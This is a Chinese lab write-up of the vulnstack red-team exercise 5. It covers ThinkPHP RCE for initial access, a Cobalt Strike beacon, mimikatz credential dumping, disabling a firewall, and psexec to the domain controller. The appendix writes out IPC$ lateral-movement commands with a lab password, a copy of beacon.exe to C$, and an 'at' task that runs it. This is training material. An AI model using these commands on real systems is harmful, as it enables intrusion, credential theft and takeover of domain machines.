渗透靶场|渗透靶场--vulnstack-红队评估实战(5)

vulnstack-红队评估实战(5) 环境配置

win7 sun\heart 123.comsun\Administrator dc123.com 内网:192.168.138.136 外网:192.168.154.140 启动phpstudy2008 sun\admin 2021.com 192.168.138.138kali 192.168.154.129

1.对外网主机进行信息搜集
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

搜索知道有一个代码执行漏洞,vulmap跑
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

获得shell
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

2.内网信息搜集
权限为administrator
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

生成exe上传执行,上线CS
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

执行mimikatz得到
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

由于administrator不能查询域信息,利用跑出来的面膜spawn as 出一个leo用户shell
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

域管理员为Administrator ,域控机器名为DC
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

ping DC.sun.com得到域控IP
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

3.横向移动
net view错误,那就通过port scan扫描到138使其加入到targets中
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

又因为DC不出网,所以再win7上建立监听
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

建立监听后直接通过利用之前跑出的administrator用户和psexec来控制DC
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

但是这里跑不出来,后来发现是WIN7建立监听但是防火墙没有关闭,导致DC无法与端口进行传输
所以关闭防火墙
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

DC上线!
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

DC用户的密码
渗透靶场|渗透靶场--vulnstack-红队评估实战(5)
文章图片

附 这里横向也可以利用IPC(当密码过期时,psexec会失败)
建立IPC连接
net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator

检查
net use

上传文件(这里的exe要是完整的,监听为Win7的)
copy C:\\beacon.exe \\192.168.138.138\c$

【渗透靶场|渗透靶场--vulnstack-红队评估实战(5)】查看时间,设置计划任务(间隔时间不要太短)
net time \\192.168.138.138 at \\192.168.138.138 yy:xx:mm c:\beacon.exe

    推荐阅读